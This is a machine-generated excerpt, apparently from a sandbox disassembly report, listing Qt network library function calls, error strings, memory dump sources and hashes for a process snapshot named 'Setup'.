                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF32A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF338
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF346
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF30C
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFB4B
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: ?fromWCharArray@QString@@SA?AV1@PEB_WH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC07
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC2C
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF2C6
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3B5
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3DA
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3EB
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF3FB
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF419
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF427
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF435
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Message$Logger@@$Category@@LoggingString@@$?warning@Enabled@H00@String@@@Warning$?fromArray@CharCreateFormatFreeInit_thread_footerInstanceLocal
                                                                                                                                                              • String ID: Could not get a NetworkListManager instance:$Could not get connectivity:$Failed to get connection point for network list manager events:
                                                                                                                                                              • API String ID: 139455383-40377270
                                                                                                                                                              • Opcode ID: 6d6ab1cbb68bdc8705f4a1d76a6027a9e089e9b7bb47c65d14fe61469ece1ba2
                                                                                                                                                              • Instruction ID: 6480d5318e07cf3f17b13ce9082e7e84b8f142c0c4fbbc3350ade504c6c7343f
                                                                                                                                                              • Opcode Fuzzy Hash: 6d6ab1cbb68bdc8705f4a1d76a6027a9e089e9b7bb47c65d14fe61469ece1ba2
                                                                                                                                                              • Instruction Fuzzy Hash: D67153B660AA4291EB92DB75E8542AA7361FF84F94F408032CE9E47764FF3CD549CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Array@@ByteData@@$Object@@$?dispose@?free_helper@Data@1@@HashListNode@1@@$?invoke?setArgument@@333333333@ConnectionMetaMethod@Parent@Qt@@Type@V1@@
                                                                                                                                                              • String ID: _q_startOperation
                                                                                                                                                              • API String ID: 1837584542-2504287645
                                                                                                                                                              • Opcode ID: 604c04cfbe82ff567e57ba862b7412ba1b7bbf722b96ab0e40b3cf9b7f1f7f25
                                                                                                                                                              • Instruction ID: d7114f4e1ffeca70a9776c14bcded3bc2f4f8e8927acafbd7f4970d204e70679
                                                                                                                                                              • Opcode Fuzzy Hash: 604c04cfbe82ff567e57ba862b7412ba1b7bbf722b96ab0e40b3cf9b7f1f7f25
                                                                                                                                                              • Instruction Fuzzy Hash: D3D15B62A09B9586E7668F38D9443ED73B1FF58718F498232CE4E57614EF38E196CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00BEE
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C17
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C27
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C59
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C7E
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C8C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00C9C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00CB7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00CC2
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00CCD
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D01
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D2A
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D38
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D48
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D63
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D6E
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1A00F48), ref: 00007FFBA1A00D79
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$Category@@Logging$?warning@Enabled@H00@Warning$String@@String@@@$Init_thread_footer
                                                                                                                                                              • String ID: Could not get connectivity:$Failed to subscribe to network connectivity events:$Initialization failed, can't start!
                                                                                                                                                              • API String ID: 1023853659-3975294137
                                                                                                                                                              • Opcode ID: 10481af48e2613c5627679e4dda5f23b61c5d7f0503cd4bf12592ee421f05370
                                                                                                                                                              • Instruction ID: 040ba80fe800539e07f94b25771df6925008c762d59befdc5464478f2b5d7d31
                                                                                                                                                              • Opcode Fuzzy Hash: 10481af48e2613c5627679e4dda5f23b61c5d7f0503cd4bf12592ee421f05370
                                                                                                                                                              • Instruction Fuzzy Hash: DB514DB6B0AA0292EB82DB35E4541AA73A1FF84B94F445132DE5E47765EE3CE449CF00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@$List$Hash$?allocate?begin@?end@?lock@?willArgument@@Empty@GenericGrow@Mutex@@Node@Return
                                                                                                                                                              • String ID: requestUpdate
                                                                                                                                                              • API String ID: 1835494060-1218863351
                                                                                                                                                              • Opcode ID: 30cee7b9681ea7c7a230f35a885095369268bc9ddbc8d5a7a3f7d741ac6df515
                                                                                                                                                              • Instruction ID: 3c38650159c1633d55f22e95e09dd90e1bbbacde3239f8cec0d05d7159bdb6f5
                                                                                                                                                              • Opcode Fuzzy Hash: 30cee7b9681ea7c7a230f35a885095369268bc9ddbc8d5a7a3f7d741ac6df515
                                                                                                                                                              • Instruction Fuzzy Hash: B9B15F22A09B95C6E752CF39D8442ED77B1FF98748F859222DE4D17654EF38E285CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$Debug@@$?debug@$?critical@V0@_
                                                                                                                                                              • String ID: bytesDownloaded$QNetworkReplyImpl: backend error: caching was enabled after some bytes had been written$QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false)$setCachingEnabled:
                                                                                                                                                              • API String ID: 2277586335-4053102236
                                                                                                                                                              • Opcode ID: 79aa523c767ee3c5d69f9bebd8544031ce00204581f9e43c3e375d5693950992
                                                                                                                                                              • Instruction ID: 480319db7086c733f7728af0531f4074df90dc357487c54e8aeef513e80dd929
                                                                                                                                                              • Opcode Fuzzy Hash: 79aa523c767ee3c5d69f9bebd8544031ce00204581f9e43c3e375d5693950992
                                                                                                                                                              • Instruction Fuzzy Hash: 83418672A1DA5282EB92DB35F4542A973A1FF94B98F844132DE5E07A65EF3CD049CF00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@String$?invokeArgument@@444444444@ConnectionDuplicates@List@@@List_removeMetaMethod@Private@@Qt@@Type@
                                                                                                                                                              • String ID: QStringList$supportedSchemesImplementation
                                                                                                                                                              • API String ID: 3884633335-52536607
                                                                                                                                                              • Opcode ID: 3855794472fc38f05349832be76a1ae9e98935830c002852593a07141c456243
                                                                                                                                                              • Instruction ID: a05c09ac972ff16b71ab6894c6365d1474735fba2a8c29cf0b4862914940630a
                                                                                                                                                              • Opcode Fuzzy Hash: 3855794472fc38f05349832be76a1ae9e98935830c002852593a07141c456243
                                                                                                                                                              • Instruction Fuzzy Hash: 5F714B26618EC4D5F7029F3CD8092E973B1FF98359F859222DF8D06625EF39964ACB00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E817F
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8189
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8193
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81AD
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81B7
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81CC
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81D9
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81E3
                                                                                                                                                              • ?system@QRandomGenerator64@@SAPEAV1@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81E9
                                                                                                                                                              • ?_fillRange@QRandomGenerator@@AEAAXPEAX0@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81FC
                                                                                                                                                              • ?number@QByteArray@@SA?AV1@_KH@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E821A
                                                                                                                                                              • ?hash@QCryptographicHash@@SA?AVQByteArray@@AEBV2@W4Algorithm@1@@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E822C
                                                                                                                                                              • ?toHex@QByteArray@@QEBA?AV1@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E823A
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8247
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8252
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E825D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8268
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$Random$?_fill?hash@?number@?system@Algorithm@1@@CryptographicDateGenerator64@@Generator@@Hash@@Hex@Range@Time@@V0@$$V0@@V1@_malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2954538713-0
                                                                                                                                                              • Opcode ID: ca848f34df8baed5c52c8df4a95fe6731a03c8979b863fa4f9ab393d405bf1ea
                                                                                                                                                              • Instruction ID: 93badbb9405a02e82f00a6395e5f8a85f2f5b90453f4562b679133ff6c0ec552
                                                                                                                                                              • Opcode Fuzzy Hash: ca848f34df8baed5c52c8df4a95fe6731a03c8979b863fa4f9ab393d405bf1ea
                                                                                                                                                              • Instruction Fuzzy Hash: C8416DB2A0AA52E3DB41DF21E9440AD7761FB84B64B404036DE5E07A64EF3CE56ACF40
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Random number generator not seeded, disabling SSL support, xrefs: 00007FFBA1A46D6B
                                                                                                                                                              • QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead, xrefs: 00007FFBA1A46CE5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$?warning@Category@@Enabled@H00@Locker@@LoggingMutexWarning
                                                                                                                                                              • String ID: QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead$Random number generator not seeded, disabling SSL support
                                                                                                                                                              • API String ID: 3683325604-862028492
                                                                                                                                                              • Opcode ID: b5e3e1f0ddda3e8c900d5fe30d8033ede178577a79e740159409b0a4a62e538e
                                                                                                                                                              • Instruction ID: 278335ce5773766bb0c3d21f4413fc7b385e41e62bbde810134aaca75b1878b6
                                                                                                                                                              • Opcode Fuzzy Hash: b5e3e1f0ddda3e8c900d5fe30d8033ede178577a79e740159409b0a4a62e538e
                                                                                                                                                              • Instruction Fuzzy Hash: 7E5130B5E0EA8281FBD29B34E8513B92351FF85764F848137DD6E866A5FE2CD4498F00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Random number generator not seeded, disabling SSL support, xrefs: 00007FFBA1A43A31
                                                                                                                                                              • QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead, xrefs: 00007FFBA1A439C1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$?warning@Category@@Enabled@H00@Locker@@LoggingMutexWarning
                                                                                                                                                              • String ID: QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead$Random number generator not seeded, disabling SSL support
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CertStore$Array@@ByteCertificateData@@FindList$?append@?dispose@CloseData@1@@Locker@@MutexOpenSystem
                                                                                                                                                              • String ID: ROOT
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$V0@@$String@@$Data$?index?size@$ArrayDatePtr@@@Time@@V0@$$$Base@@$?mid@Init_thread_footer$?at@?create?qstrcmp@@?trimmed@A@$$Array@@0@NodeNode@Ref@@$?contains@?from?recalc?setBase64@CriticalData@Empty@EnterLeftMostParent@SectionU1@@U2@_V1@@
                                                                                                                                                              • String ID: -----$-----$Proc-Type:
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$String$ArrayData@@$?data@Ref@@$Latin1$String@V0@@$CaseDateQt@@@Sensitivity@Time@@V0@$$$?child?mid@?startsChildEvent@Event@@@Object@@With@$Char@@Flags@Logger@@MessageString@@@$??8@?deallocate@?from?split?warning@BehaviorCategory@@Char@@@Enabled@H00@Latin1@LoggingQt@@@@Ref@Ref@@@Ref@@@@SplitU1@_Vector@Warning
                                                                                                                                                              • String ID: Au=$Enc=$Kx=$SSLv2$SSLv3$TLSv1$TLSv1.1$TLSv1.2$TLSv1.3$aecdh$export
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@List$V0@@$Array@@Byte$Url@@$?begin@$Latin1$?dispose@BasicData@1@@Mutex@@String@@@Timer@@$?lock@?scheme@Locker@@Logger@@MessageMutex$?detach_grow@?end@?host@?starts?warning@CaseComponentData@1@Empty@Flags@FormattingOption@Qt@@@Sensitivity@Url@@@@@With@malloc
                                                                                                                                                              • String ID: QNetworkProxyFactory: factory %p has returned an empty result set$localhost$localhost.
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$V0@@$Url@@$Array@@Byte$?setArrayFlags@FormattingMode@1@@Name@Option@Parsing$??8@ComponentData@@String@@0@User$?allocate@?from?lock@?shared?userA@$$AllocationConcurrency::details::stl_critical_section_win7::stl_critical_section_win7Data@@@@@Empty@Encoded@Fragment@Latin1@Locker@@MutexMutex@@Null@Option@2@@@@U1@_Url@@@@@
                                                                                                                                                              • String ID: auth:
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@$V0@@$DateTime@@$Empty@Locale@@String@@@$Ace@Char@@Latin1Qt@@@Spec@TimeUrl@@Utf8@$?mid@?startsA@$$BasicCaseChar@@@Country@0@@Language@0@Latin1@Sensitivity@String@Timer@@V2@@Valid@With@
                                                                                                                                                              • String ID: ; HttpOnly$; domain=$; expires=$; path=$; secure$ddd, dd-MMM-yyyy hh:mm:ss 'GMT
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1985180: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA19851F4
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19782CB
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19782D8
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19782FC
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197830A
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978317
                                                                                                                                                              • ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978328
                                                                                                                                                              • ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197836E
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197837F
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197838D
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197839E
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783A8
                                                                                                                                                              • ?begin@QByteArray@@QEAAPEADXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783B5
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783E0
                                                                                                                                                              • ?cend@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783EC
                                                                                                                                                              • ?resize@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197842F
                                                                                                                                                              • ??0QVariant@@QEAA@AEBVQByteArray@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197843D
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978454
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197845E
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978482
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784AE
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784C7
                                                                                                                                                              • ?isReadable@QIODevice@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784D8
                                                                                                                                                              • ?isOpen@QIODevice@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784EA
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978512
